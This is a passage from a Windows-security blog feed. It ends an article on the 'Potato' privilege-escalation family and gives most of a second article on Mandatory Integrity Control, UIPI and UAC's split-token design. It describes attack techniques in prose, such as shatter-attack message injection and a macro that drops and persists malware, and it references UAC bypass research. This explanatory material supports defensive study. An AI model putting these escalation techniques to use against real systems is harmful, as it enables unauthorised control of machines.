&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; The Potato family is not a stack of bugs Microsoft is slowly working through. It is the long-running consequence of a published architectural decision: that the &lt;code&gt;SeImpersonatePrivilege&lt;/code&gt;-to-SYSTEM transition is a safety boundary, not a security boundary. Eleven variants over nine years of named-variant disclosures (HotPotato January 2016 -&amp;gt; FakePotato August 2024) are the empirical proof of how stable that decision is [@troopers24; @msrc-servicing-criteria].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The following retention block summarises the six key terms above. Citations for each definition live in §2.1, §2.2, §6.5, §6.1, §3, and §2 of the body respectively (the StudyGuide MDX wrapper does not render &lt;code&gt;@ref-id&lt;/code&gt; links inline).&lt;/p&gt;
&lt;p&gt;&amp;lt;StudyGuide slug=&quot;potato-family-decade-ntlm-reflection&quot; keyTerms={[
  { term: &quot;SeImpersonatePrivilege&quot;, definition: &quot;Windows user-rights assignment that permits a thread to substitute another user&apos;s security context for its own; granted by default to LOCAL SERVICE, NETWORK SERVICE, and most service accounts (see §2.1 for full citation).&quot; },
  { term: &quot;ImpersonateNamedPipeClient&quot;, definition: &quot;Win32 API that lets a named-pipe server adopt the security context of whoever just connected to the pipe; documented today as supported since Windows XP for clients and Windows Server 2003 for servers (see §2.2 for full citation).&quot; },
  { term: &quot;OXID resolver&quot;, definition: &quot;RPCSS subsystem that resolves Object Exporter Identifiers during DCOM activation; hard-coded to 127.0.0.1:135 in Windows 10 1809 / Server 2019 to mitigate JuicyPotato (see §6.1).&quot; },
  { term: &quot;RPC_C_AUTHN_LEVEL_PKT_INTEGRITY&quot;, definition: &quot;RPC authentication-level constant requiring per-packet integrity signing; the minimum CVE-2021-26414 enforces on DCOM activation in Phase 3 (March 14, 2023) (see §6.5).&quot; },
  { term: &quot;NTLM reflection&quot;, definition: &quot;Special case of NTLM relay where the authentication is forwarded back to the originating machine, typically across protocols (HTTP to SMB, DCOM to local RPC) (see §3).&quot; },
  { term: &quot;Security boundary vs safety boundary&quot;, definition: &quot;MSRC servicing-criteria distinction: security boundaries get CVEs and security updates; safety boundaries are patched when convenient but carry no service-level guarantee (see §2).&quot; }
]} /&amp;gt;&lt;/p&gt;
</content:encoded><category>windows-security</category><category>privilege-escalation</category><category>ntlm-relay</category><category>dcom</category><category>msrc</category><category>red-team</category><category>post-exploitation</category><author>noreply@paragmali.com (Parag Mali)</author></item><item><title>The Integrity-Level Stack: MIC, UIPI, and Twenty Years of UAC&apos;s Quiet Plumbing</title><link>https://paragmali.com/blog/the-integrity-level-stack-mic-uipi-and-twenty-years-of-uacs-/</link><guid isPermaLink="true">https://paragmali.com/blog/the-integrity-level-stack-mic-uipi-and-twenty-years-of-uacs-/</guid><description>What UAC actually is beneath the consent prompt: Mandatory Integrity Control, UIPI, the split-token model, and twenty years of bypass research as proof.</description><pubDate>Sun, 31 May 2026 00:00:00 GMT</pubDate><content:encoded>
**UAC has never been the consent prompt.** Two Vista-era primitives, Mandatory Integrity Control (MIC) and User Interface Privilege Isolation (UIPI), add an integrity axis to the access check and a windowing-layer analog that blocks cross-IL message injection. The split-token model gives every administrator a Medium-IL filtered token at logon and holds the full admin token dormant. The yellow dialog is the smallest part of the system. The author of its canonical reference, Mark Russinovich, publicly disclaimed it as &quot;not a security boundary&quot; in February 2007, and twenty years of bypass research has been the empirical confirmation. In November 2024, Microsoft finally moved the boundary line with Administrator Protection. The MIC + UIPI plumbing outlived UAC itself: it is still the substrate of every browser sandbox, every AppContainer, and the Adminless successor in 2026.
&lt;h2&gt;1. Two whoami Outputs, Sixty Seconds Apart&lt;/h2&gt;
&lt;p&gt;Open an unelevated PowerShell on a Windows 11 administrator account. Run &lt;code&gt;whoami /groups /priv&lt;/code&gt;. Click &quot;Yes&quot; on the yellow prompt. Open an elevated PowerShell on the &lt;em&gt;same&lt;/em&gt; account. Run the same command. The two outputs are different lists of SIDs. Sixty seconds have passed. The consent prompt did not move a single bit of OS state on its own. The operating system did, because of a stack of primitives that ship with every Windows install and that almost no Windows user has ever heard the names of. This article is a tour of that stack, and of what twenty years of bypass research has taught us about it.&lt;/p&gt;
&lt;p&gt;Place the two outputs side by side. The user is the same. The session is the same. The clock has barely moved. Read them carefully.&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-text&quot;&gt;PS C:\Users\admin&amp;gt; whoami /groups /priv | findstr /i &quot;Mandatory Administrators SeDebug&quot;
BUILTIN\Administrators                Group used for deny only
Mandatory Label\Medium Mandatory Level Label
(SeDebugPrivilege not present)
&lt;/code&gt;&lt;/pre&gt;
&lt;pre&gt;&lt;code class=&quot;language-text&quot;&gt;PS C:\Users\admin&amp;gt; whoami /groups /priv | findstr /i &quot;Mandatory Administrators SeDebug&quot;
BUILTIN\Administrators                Enabled by default, Enabled group, Group owner
Mandatory Label\High Mandatory Level   Label
SeDebugPrivilege                       Disabled
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Four facts fall out of those two outputs, and each one of them is a foothold for the rest of this article.&lt;/p&gt;
&lt;p&gt;The first fact is that the administrator group SID is &lt;em&gt;present in both tokens&lt;/em&gt;. It is not added by the elevation. In the filtered token it carries the flag &lt;code&gt;SE_GROUP_USE_FOR_DENY_ONLY&lt;/code&gt;, which means the access-check algorithm consults it only when matching a deny ACE and otherwise pretends it is absent [@uac-how-it-works]. In the elevated token, the same SID is fully enabled. The dialog did not add a SID; it changed which token Windows uses.&lt;/p&gt;
&lt;p&gt;The second fact is the integrity level. In the filtered token, the mandatory label reads &lt;code&gt;Mandatory Label\Medium Mandatory Level&lt;/code&gt;. In the elevated token, the same label reads &lt;code&gt;Mandatory Label\High Mandatory Level&lt;/code&gt;. That label corresponds to a well-known SID under the &lt;code&gt;S-1-16-X&lt;/code&gt; family (&lt;code&gt;S-1-16-8192&lt;/code&gt; for Medium and &lt;code&gt;S-1-16-12288&lt;/code&gt; for High) [@well-known-sids]. The integrity level is not a regular group SID. It is a separate field on the token, and as we will see in §4, it drives a separate access-check evaluator that runs &lt;em&gt;before&lt;/em&gt; the discretionary access check [@mic-doc].&lt;/p&gt;
&lt;p&gt;The third fact is the privilege set. The filtered token holds a small set of user-mode privileges (&lt;code&gt;SeChangeNotifyPrivilege&lt;/code&gt;, &lt;code&gt;SeShutdownPrivilege&lt;/code&gt;, a handful of others). The elevated token holds the full administrator privilege set, including the named ones the security press writes about: &lt;code&gt;SeDebugPrivilege&lt;/code&gt;, &lt;code&gt;SeTakeOwnershipPrivilege&lt;/code&gt;, &lt;code&gt;SeLoadDriverPrivilege&lt;/code&gt;, &lt;code&gt;SeBackupPrivilege&lt;/code&gt;, &lt;code&gt;SeAssignPrimaryTokenPrivilege&lt;/code&gt;, and twenty or so others, depending on the Windows build [@russinovich-tnm-2007].&lt;/p&gt;
&lt;p&gt;The fourth fact is the most subtle, and the one this whole article exists to make rigorous. The yellow dialog did not &lt;em&gt;create&lt;/em&gt; the elevated token. The OS created it at logon, almost half an hour before the prompt ever rendered, and held it dormant in the LSA. The prompt asked the user a single question: &lt;em&gt;may I, the operating system, use the token I already have?&lt;/em&gt; It did not ask: &lt;em&gt;may I, the operating system, mint a more privileged token now?&lt;/em&gt; That distinction is the difference between how every Windows user &lt;em&gt;talks&lt;/em&gt; about UAC and how UAC actually works.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The yellow dialog moves no bits. It asks permission to use authority that was already constructed at logon and held dormant. The integrity primitives, MIC and UIPI, do the bounding work whether or not a prompt ever renders.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The four primitives we are about to tour are the substrate beneath everything in those two &lt;code&gt;whoami&lt;/code&gt; outputs. Mandatory Integrity Control (MIC) is the access-check evaluator that decided your Medium-IL PowerShell could not write into &lt;code&gt;%SystemRoot%\System32&lt;/code&gt; before any DACL was consulted. User Interface Privilege Isolation (UIPI) is the windowing-layer analog that prevented your Medium-IL Edge tab from injecting &lt;code&gt;WM_SETTEXT&lt;/code&gt; into the High-IL elevated PowerShell next to it. The split-token model is the LSA policy that decided your interactive shell should hold the Medium-IL token instead of the High-IL one. The Application Information service (Appinfo) is the SYSTEM-trusted broker that mediated the token swap when you clicked &quot;Yes.&quot;&lt;/p&gt;
&lt;p&gt;This article walks every one of those layers, then ends at the empirical proof: twenty years of &quot;UAC bypasses,&quot; and Microsoft&apos;s own quiet acknowledgement, from week one, that the dialog was never the security boundary [@russinovich-blog-2007]. Why did Microsoft build this stack in the first place? What was wrong with how Windows XP did it?&lt;/p&gt;
&lt;h2&gt;2. The XP Problem and the Vista Bet&lt;/h2&gt;
&lt;p&gt;On the overwhelming majority of consumer Windows XP installs in 2003, every process the user launched ran as Administrator, because the first interactive account XP provisioned at setup was an Administrator and the typical user never created a separate Limited User account [@margosis-archive]. Every browser tab. Every embedded Word macro. Every drive-by download. The operational vulnerability surface was the entire OS, because authority on Windows is carried in the access token, and the access token of those XP-era user processes held the full administrator SID set.&lt;/p&gt;
&lt;p&gt;Sysinternals co-founder Mark Russinovich, then a Microsoft engineer following the 2006 Winternals acquisition, framed the problem precisely in the June 2007 issue of &lt;em&gt;TechNet Magazine&lt;/em&gt;: &quot;Most users of Windows XP run with full administrative rights all the time, allowing all software they run, including malware, to have unrestricted access to the system&quot; [@russinovich-tnm-2007]. The sentence reads like a confession, and it was. The OS shipped with a sound access-control model and an operational policy that defeated it from the first reboot.&lt;/p&gt;
&lt;p&gt;Two distinct threat models drove the architectural response Vista shipped four years later.&lt;/p&gt;
&lt;h3&gt;Threat model one: the runaway admin&lt;/h3&gt;
&lt;p&gt;The first threat model was the &lt;em&gt;runaway admin&lt;/em&gt;. Default-admin consumer installs meant malware silently inherited admin authority because the user &lt;em&gt;was&lt;/em&gt; the admin. A drive-by exploit in Internet Explorer ran as the user, the user was an admin, and the malware was an admin. There was no point in the OS where a least-privilege boundary could intervene, because the token never carried a least-privilege bound to begin with. The DACLs were correct; the policy that filled the tokens was the failure.&lt;/p&gt;
&lt;h3&gt;Threat model two: the shatter-attack class&lt;/h3&gt;
&lt;p&gt;The second threat model was the &lt;em&gt;shatter-attack class&lt;/em&gt;. In August 2002, security researcher Chris Paget published a paper titled &quot;Exploiting design flaws in the Win32 API for privilege escalation&quot; on the Bugtraq mailing list, immediately mirrored on Help Net Security [@helpnet-paget]. The paper coined the term &lt;em&gt;shatter attack&lt;/em&gt; and demonstrated that on Windows NT, 2000, and XP, any process running on a user&apos;s interactive desktop could send a &lt;code&gt;WM_TIMER&lt;/code&gt; message carrying a callback function pointer to any other process&apos;s message loop on the same desktop. The receiving process would invoke the callback in its own address space, at its own privilege level [@shatter-wiki].&lt;/p&gt;
&lt;p&gt;The shatter-attack term is sometimes attributed to Brett Moore alone. Paget&apos;s August 2002 Bugtraq paper actually coined the term; Moore&apos;s Black Hat USA 2004 talk &lt;em&gt;Shoot The Messenger: Win32 Shatter Attacks&lt;/em&gt; productised the technique class and brought it to a wider conference audience. Both attributions are correct for different artifacts.&lt;/p&gt;
&lt;p&gt;This was an architectural defect. The receiving process did not authenticate the message origin. It could not, because the Win32 messaging system was designed in the late 1980s under the assumption that all windows on a desktop belonged to one trust principal. By 2002, that assumption had been false for a decade: services ran on the user&apos;s interactive desktop with &lt;code&gt;LocalSystem&lt;/code&gt; authority, and the user&apos;s browser could send them messages.&lt;/p&gt;
&lt;p&gt;Microsoft&apos;s December 2002 patch (security bulletin MS02-071) fixed individual services that exposed the most exploitable callbacks. It did not fix the architectural class, because the class was a property of the Win32 messaging design, not of any one service [@shatter-wiki].&lt;/p&gt;

The popular history of the shatter-attack class collapses two separate authorship events into one. Chris Paget&apos;s August 2002 Bugtraq paper coined the term and produced the original demonstration tool (which Paget called &quot;Shatter&quot;) [@helpnet-paget]. Brett Moore&apos;s Black Hat USA 2004 talk *Shoot The Messenger: Win32 Shatter Attacks*, eighteen months later, productised the technique into a conference-grade reference talk and contributed additional disclosure work at Security-Assessment.com.&lt;p&gt;Both attributions are accurate for different artifacts: Paget for the term and the August 2002 paper, Moore for the Black Hat 2004 productisation. The Wikipedia &lt;em&gt;Shatter attack&lt;/em&gt; article preserves both authorships verbatim [@shatter-wiki]. The reason the disambiguation matters: any historical account of Vista&apos;s UIPI design decision must attribute the threat-model framing correctly, because Microsoft cited Paget&apos;s 2002 paper, not Moore&apos;s 2004 talk, in the internal architectural discussions Russinovich later summarised [@russinovich-blog-2007].
&lt;/p&gt;&lt;p&gt;&lt;/p&gt;
&lt;h3&gt;The Vista bet, stated as four design decisions&lt;/h3&gt;
&lt;p&gt;Between 2005 and 2006, Microsoft made four decisions about how Vista would respond. The first was to split the administrator&apos;s authority by default: an admin user would not hold a single admin token at logon, but a filtered token plus a dormant linked one. The second was to mediate the recombination through an OS-controlled UI surface, so the user could see and consent to the moment authority crossed an integrity boundary. The third was to add a second access-check axis (integrity) that the DACL could not override. The fourth was to add a windowing-layer analog to close the cross-IL variant of the shatter-attack class.&lt;/p&gt;
&lt;p&gt;All four shipped together. Vista RTM&apos;d on November 8, 2006 to OEMs and businesses, and Microsoft launched it to consumers on January 30, 2007 [@vista-press-release]. The press release called it &quot;the most significant product launch in Microsoft Corp.&apos;s history.&quot;&lt;/p&gt;
&lt;p&gt;The architectural canon was published five months later, in the June 2007 issue of &lt;em&gt;TechNet Magazine&lt;/em&gt; under the title &lt;em&gt;Security: Inside Windows Vista User Account Control&lt;/em&gt; [@russinovich-tnm-2007]. The author was Russinovich, and the article became the single most-cited primary on UAC in the Windows-security literature. Five months &lt;em&gt;earlier&lt;/em&gt;, however, in a TechNet Blogs post about PsExec, the same author had quietly written something the entire later debate would rest on, and almost no one read it for what it actually said [@russinovich-blog-2007]. We will return to that post in §7. First, the harder question: why couldn&apos;t NT&apos;s existing access-control model handle any of this on its own?&lt;/p&gt;
&lt;h2&gt;3. Why the DACL and the Privilege Were Not Enough&lt;/h2&gt;
&lt;p&gt;Windows NT had the &lt;a href=&quot;https://paragmali.com/blog/windows-access-control-25-years-of-attacks/&quot; rel=&quot;noopener&quot;&gt;access-control model&lt;/a&gt; from day one. It had Security Identifiers (SIDs), access tokens, discretionary access control lists (DACLs), privileges, and an access-check algorithm with a name (&lt;code&gt;SeAccessCheck&lt;/code&gt;) that the kernel exposed and documented [@access-control][@windows-internals]. The model was correct in theory and broken in practice. To see why, watch what happens when an XP administrator opens a malicious Word document.&lt;/p&gt;
&lt;p&gt;The user double-clicks the document. Word starts. Word loads the document&apos;s embedded macro. The macro calls &lt;code&gt;URLDownloadToFile&lt;/code&gt; and writes &lt;code&gt;evil.exe&lt;/code&gt; into &lt;code&gt;%TEMP%&lt;/code&gt;. Then it calls &lt;code&gt;CreateProcess&lt;/code&gt; on &lt;code&gt;evil.exe&lt;/code&gt;. The new process inherits its parent&apos;s primary access token, which is the user&apos;s interactive token, which carries the administrator group SID, enabled, with the full administrator privilege set. The DACL on &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Services&lt;/code&gt; grants Full Control to &lt;code&gt;BUILTIN\Administrators&lt;/code&gt;. The malware writes a new service entry. The malware now persists across reboots, all without a single elevation prompt, because there was no elevation transition to prompt at. The user was already the administrator [@russinovich-tnm-2007].&lt;/p&gt;
&lt;p&gt;The first problem is in the &lt;em&gt;D&lt;/em&gt; of DACL. Discretionary access control lists are &lt;em&gt;discretionary&lt;/em&gt; by definition: the owning principal of an object decides who has access [@dacls-control]. An attacker running as the user can rewrite any DACL the user owns. That is not a bug; it is the meaning of the word &lt;em&gt;discretionary&lt;/em&gt;. Mandatory access-control models (Bell-LaPadula 1973 [@blp-wiki], Biba 1977 [@biba-wiki]) exist precisely because discretionary models cannot defend against principals running with the owner&apos;s authority.&lt;/p&gt;
&lt;p&gt;The second problem is in the privilege model. A Windows access token carries a list of named &lt;em&gt;privileges&lt;/em&gt; such as &lt;code&gt;SeDebugPrivilege&lt;/code&gt;, &lt;code&gt;SeTakeOwnershipPrivilege&lt;/code&gt;, &lt;code&gt;SeLoadDriverPrivilege&lt;/code&gt;. Each privilege is a per-token authorisation to bypass some specific DACL check. An admin token holds them all. There is no way in the NT 4.0 / 2000 / XP design to say &quot;this Word process holds the admin&apos;s identity but should not be trusted to use &lt;code&gt;SeDebugPrivilege&lt;/code&gt;.&quot; Privileges are granted to tokens at logon, and the only way to remove them from a downstream process is to construct a restricted token explicitly, by hand, with &lt;code&gt;CreateRestrictedToken&lt;/code&gt; [@createrestrictedtoken].&lt;/p&gt;
&lt;h3&gt;Generation 1: the seven-year failure to make least-privilege voluntary&lt;/h3&gt;
&lt;p&gt;Between 1999 and 2006, Microsoft and the Windows security community tried five different ways to make least privilege voluntary. None of them worked at consumer scale.&lt;/p&gt;
&lt;p&gt;&lt;code&gt;CreateRestrictedToken&lt;/code&gt; is a Win32 API, documented since Windows XP and Server 2003, that produces a copy of an existing access token with selected SIDs marked deny-only, selected privileges removed, and an optional list of restricting SIDs added [@createrestrictedtoken]. It is the kernel primitive every later sandbox (Chromium&apos;s renderer sandbox, AppContainer, Office Protected View) is built on. It was a primitive, not a policy. A consumer install with default-admin logons could not use it without an opt-in from every application vendor.&lt;/p&gt;
&lt;p&gt;&lt;code&gt;runas.exe&lt;/code&gt;, shipped in Windows 2000, let a user explicitly launch a process under a different identity. The user was supposed to log in as a standard user and &lt;code&gt;runas&lt;/code&gt; an administrator account when needed. In practice, the user logged in as the administrator and forgot the standard account existed.&lt;/p&gt;
&lt;p&gt;Software Restriction Policies (SRP), shipped with Windows XP, let a domain admin define hash, path, certificate, or zone rules that the OS enforced at process creation [@srp-2003]. SRP was a policy mechanism on top of the SAFER substrate [@winsafer]. It worked when configured. On consumer Windows it was off by default; on enterprise Windows it was configured by the few who knew it existed.&lt;/p&gt;
&lt;p&gt;Aaron Margosis, then a Microsoft consultant, ran a years-long blog campaign called &quot;Non-Admin&quot; arguing that ordinary users should log in as standard users and only elevate when necessary. His tooling included LUA Buglight (which diagnosed which OS calls a misbehaving application made that required admin privilege), MakeMeAdmin (a &lt;code&gt;runas&lt;/code&gt; shim), and PrivBar (a status-bar widget that displayed the IL of the current process) [@margosis-archive]. The blog became required reading inside Microsoft and the Windows-admin community.&lt;/p&gt;

Margosis&apos;s writing documents the daily friction of being a non-admin on XP. A printer-driver installer fails because it writes a per-user setting to `HKLM`. A game launcher fails because it writes save files to `%ProgramFiles%`. A 1998 line-of-business app fails because it stores its INI file under its install directory. Each failure was the application&apos;s fault; in aggregate, the application population rendered non-admin operation untenable for the typical user [@margosis-archive].&lt;p&gt;Margosis&apos;s own pattern, openly discussed on the blog, was to give up on per-application diagnosis and log in as Administrator full-time, while documenting the friction professionally so Microsoft could harvest the data for Vista&apos;s compatibility shims. The primitives existed (&lt;code&gt;CreateRestrictedToken&lt;/code&gt;, SRP, the SAFER substrate). The third-party software base rendered them unusable. That dataset is the reason Vista shipped file and registry virtualisation as a built-in shim [@russinovich-tnm-2007]: the only alternative was for every application vendor to fix their software, and Margosis&apos;s blog had documented for half a decade that this was not happening.
&lt;/p&gt;&lt;p&gt;&lt;/p&gt;
&lt;p&gt;The lesson Microsoft took from the 1999-2006 experience was that voluntary least privilege does not scale. You cannot solve the runaway-admin problem with policy and exhortation. You need an architectural primitive that runs by default, bounds authority by integrity rather than by identity, and absorbs the legacy of applications written for unrestricted admin without breaking them. All four primitives of the Vista bet shipped together in November 2006 [@vista-press-release].&lt;/p&gt;
&lt;p&gt;What does an integrity primitive look like, and how is it different from &quot;another ACE&quot;?&lt;/p&gt;
&lt;h2&gt;4. The Twin Primitives: MIC and UIPI&lt;/h2&gt;
&lt;h3&gt;4.1 Mandatory Integrity Control&lt;/h3&gt;

An access-check evaluator that compares the integrity level of a subject token to the integrity level of a target object before consulting the object&apos;s DACL. MIC denials short-circuit the access check; a Low-IL principal cannot write to a Medium-IL object regardless of what the DACL says.
&lt;p&gt;The load-bearing fact about MIC is in a single sentence on the Microsoft Learn reference page, and the entire architectural difference between MIC and &quot;just another ACE&quot; lives in that sentence. MIC &quot;evaluates access before access checks against an object&apos;s discretionary access control list (DACL) are evaluated&quot; [@mic-doc].&lt;/p&gt;
&lt;p&gt;Pause on that ordering. &lt;em&gt;Before&lt;/em&gt; the DACL. Not &lt;em&gt;together with&lt;/em&gt; it. Not &lt;em&gt;after&lt;/em&gt; it. The integrity-level check is a separate evaluator that runs first, and its denial is final. If the IL check denies access, the DACL is never consulted, no matter what the DACL says. That is what the word &lt;em&gt;mandatory&lt;/em&gt; in &lt;em&gt;Mandatory Integrity Control&lt;/em&gt; means.&lt;/p&gt;

A well-known SID, carried on every Windows access token and every securable object, that orders subjects and objects on a seven-level integrity lattice (Untrusted, Low, Medium, Medium Plus, High, System, Protected Process).
&lt;p&gt;The seven well-known integrity-level SIDs are defined in the &lt;em&gt;Well-known SIDs&lt;/em&gt; reference page on Microsoft Learn [@well-known-sids].&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Integrity level&lt;/th&gt;
&lt;th&gt;RID (S-1-16-X)&lt;/th&gt;
&lt;th&gt;Typical use&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Untrusted&lt;/td&gt;
&lt;td&gt;&lt;code&gt;S-1-16-0&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Most-restricted sandboxes; rare on consumer Windows&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Low&lt;/td&gt;
&lt;td&gt;&lt;code&gt;S-1-16-4096&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;IE Protected Mode, AppContainer, Edge / Chrome renderers&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Medium&lt;/td&gt;
&lt;td&gt;&lt;code&gt;S-1-16-8192&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Default for interactive user processes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Medium Plus&lt;/td&gt;
&lt;td&gt;&lt;code&gt;S-1-16-8448&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;UI-Access processes (&lt;code&gt;uiAccess=true&lt;/code&gt; manifest, Windows 7+)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;High&lt;/td&gt;
&lt;td&gt;&lt;code&gt;S-1-16-12288&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Elevated administrative processes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;System&lt;/td&gt;
&lt;td&gt;&lt;code&gt;S-1-16-16384&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Kernel-mode and &lt;code&gt;LocalSystem&lt;/code&gt; services&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Protected Process&lt;/td&gt;
&lt;td&gt;&lt;code&gt;S-1-16-20480&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;PPL-protected processes (LSASS with &lt;code&gt;RunAsPPL&lt;/code&gt;, antimalware)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;The Microsoft Learn MIC reference page describes the operational set as four integrity levels (low, medium, high, system) [@mic-doc]. The Well-known SIDs reference page enumerates seven [@well-known-sids]. Both framings are correct: Untrusted is rare on consumer systems, Medium Plus is a UI-Access-only quirk used by accessibility software, and Protected Process overlaps with Protected Process Light signing-level semantics rather than the canonical IL pipeline. The four-vs-seven discrepancy is a documentation artifact, not an inconsistency in the kernel.&lt;/p&gt;
&lt;p&gt;The IL lives on a token in the &lt;code&gt;TokenIntegrityLevel&lt;/code&gt; field, retrievable through &lt;code&gt;GetTokenInformation&lt;/code&gt; and the &lt;code&gt;TOKEN_MANDATORY_LABEL&lt;/code&gt; structure [@mic-doc]. The IL lives on an object in the system access control list (SACL) as a &lt;code&gt;SYSTEM_MANDATORY_LABEL_ACE&lt;/code&gt;, a special ACE type that carries the object&apos;s IL SID and a mandatory-policy mask [@mandatory-label-ace]. Three policy bits are defined in the &lt;code&gt;winnt.h&lt;/code&gt; header [@mandatory-label-ace].&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;SYSTEM_MANDATORY_LABEL_NO_WRITE_UP&lt;/code&gt; (0x1) -- default. A subject at lower IL cannot write to this object.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;SYSTEM_MANDATORY_LABEL_NO_READ_UP&lt;/code&gt; (0x2) -- opt-in. A subject at lower IL cannot read this object.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;SYSTEM_MANDATORY_LABEL_NO_EXECUTE_UP&lt;/code&gt; (0x4) -- opt-in. A subject at lower IL cannot execute this object.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Object authors who do not specify a mandatory label inherit the default, which is &lt;code&gt;NO_WRITE_UP&lt;/code&gt; only [@mic-doc]. The opt-in policies are exactly that: opt-in. A High-IL process that wants its files invisible to a Medium-IL process must explicitly request &lt;code&gt;NO_READ_UP&lt;/code&gt; on the SACL. By default, MIC bounds writes, not reads, and that is one of the structural shapes Forshaw&apos;s 2017 &quot;Reading Your Way Around UAC&quot; series exploited [@forshaw-reading-uac].&lt;/p&gt;
&lt;p&gt;The &quot;regardless of DACL&quot; property is the part to read slowly. A Low-IL principal cannot write to a Medium-IL object &quot;even if that object&apos;s DACL allows write access to the principal,&quot; because the IL check runs first and short-circuits the access decision before the DACL evaluator ever sees the request [@mic-doc]. This is the difference between adding &quot;another ACE&quot; for integrity and adding a separate evaluator that runs first. An integrity ACE in the DACL would have been overridable by the object owner, because DACLs are discretionary. A mandatory-label ACE in the SACL is enforced by &lt;code&gt;SeAccessCheck&lt;/code&gt; itself, independently of any other ACE in the DACL.&lt;/p&gt;

flowchart TD
    A[&quot;Subject requests access&lt;br /&gt;(SID set, IL, desired access)&quot;] --&amp;gt; B[&quot;MIC evaluator&lt;br /&gt;compares subject IL to object IL&lt;br /&gt;against NO_WRITE_UP / NO_READ_UP policy&quot;]
    B --&amp;gt; C{&quot;IL check allows&lt;br /&gt;requested access?&quot;}
    C -- &quot;No&quot; --&amp;gt; D[&quot;ACCESS_DENIED&lt;br /&gt;(DACL not consulted)&quot;]
    C -- &quot;Yes&quot; --&amp;gt; E[&quot;DACL evaluator&lt;br /&gt;walks ACEs in order&lt;br /&gt;(deny first, then allow)&quot;]
    E --&amp;gt; F{&quot;DACL grants&lt;br /&gt;requested access?&quot;}
    F -- &quot;Yes&quot; --&amp;gt; G[&quot;ACCESS_GRANTED&quot;]
    F -- &quot;No&quot; --&amp;gt; H[&quot;ACCESS_DENIED&quot;]
&lt;p&gt;The architectural payoff is in the pseudocode of the access-check decision itself. Strip the API noise away and the decision reduces to two evaluators in series. The conceptual ordering is exact.&lt;/p&gt;
&lt;p&gt;{`
// Pseudocode of the Windows access-check ordering (Vista+).
// See Microsoft Learn: Mandatory Integrity Control.&lt;/p&gt;
&lt;p&gt;function seAccessCheck(subjectToken, object, desiredAccess) {
  // Step 1: Mandatory Integrity Control. Runs before the DACL.
  const subjectIL = subjectToken.integrityLevel;     // e.g. Medium = 0x2000
  const objectIL  = object.mandatoryLabel.integrityLevel; // e.g. High = 0x3000
  const policy    = object.mandatoryLabel.policy;    // bitmask&lt;/p&gt;
&lt;p&gt;  if (subjectIL &amp;lt; objectIL) {
    if ((policy &amp;amp; NO_WRITE_UP)   &amp;amp;&amp;amp; (desiredAccess &amp;amp; WRITE_BITS))   return &apos;ACCESS_DENIED&apos;;
    if ((policy &amp;amp; NO_READ_UP)    &amp;amp;&amp;amp; (desiredAccess &amp;amp; READ_BITS))    return &apos;ACCESS_DENIED&apos;;
    if ((policy &amp;amp; NO_EXECUTE_UP) &amp;amp;&amp;amp; (desiredAccess &amp;amp; EXECUTE_BITS)) return &apos;ACCESS_DENIED&apos;;
  }&lt;/p&gt;
&lt;p&gt;  // Step 2: only if MIC allowed do we consult the DACL.
  for (const ace of object.dacl.aces) {
    if (ace.sid in subjectToken.sids) {
      if (ace.type === &apos;DENY&apos;  &amp;amp;&amp;amp; (ace.mask &amp;amp; desiredAccess)) return &apos;ACCESS_DENIED&apos;;
      if (ace.type === &apos;ALLOW&apos;) desiredAccess &amp;amp;= ~ace.mask;
      if (desiredAccess === 0) return &apos;ACCESS_GRANTED&apos;;
    }
  }
  return &apos;ACCESS_DENIED&apos;; // implicit deny if no ACE grants
}
`}&lt;/p&gt;
&lt;p&gt;The naive reading of MIC is &quot;they added another ACE for integrity.&quot; The correct reading is that they added a separate axis with its own evaluator that the DACL cannot override. The reader who internalises that ordering can re-derive almost every subsequent design decision Vista made about UAC, AppContainer, IE Protected Mode, and Administrator Protection. A MIC denial is final. The DACL is not consulted. That is what &lt;em&gt;mandatory&lt;/em&gt; means.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; MIC adds a second axis to the access check. The first axis is identity (DACL plus token SIDs); the second is integrity (IL). The two axes are evaluated in order: integrity first, identity second. A failure on the integrity axis short-circuits the entire check, regardless of what the identity axis would have said.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;MIC bounds file, registry, and most other securable-object writes across IL boundaries. But the XP-era shatter attacks Paget published in 2002 were not about file writes. They were about same-desktop cross-process message injection in the Win32 windowing layer, and MIC cannot help with that, because window messages do not pass through &lt;code&gt;SeAccessCheck&lt;/code&gt;. So Vista shipped a second primitive specifically for the windowing layer.&lt;/p&gt;
&lt;h3&gt;4.2 User Interface Privilege Isolation&lt;/h3&gt;

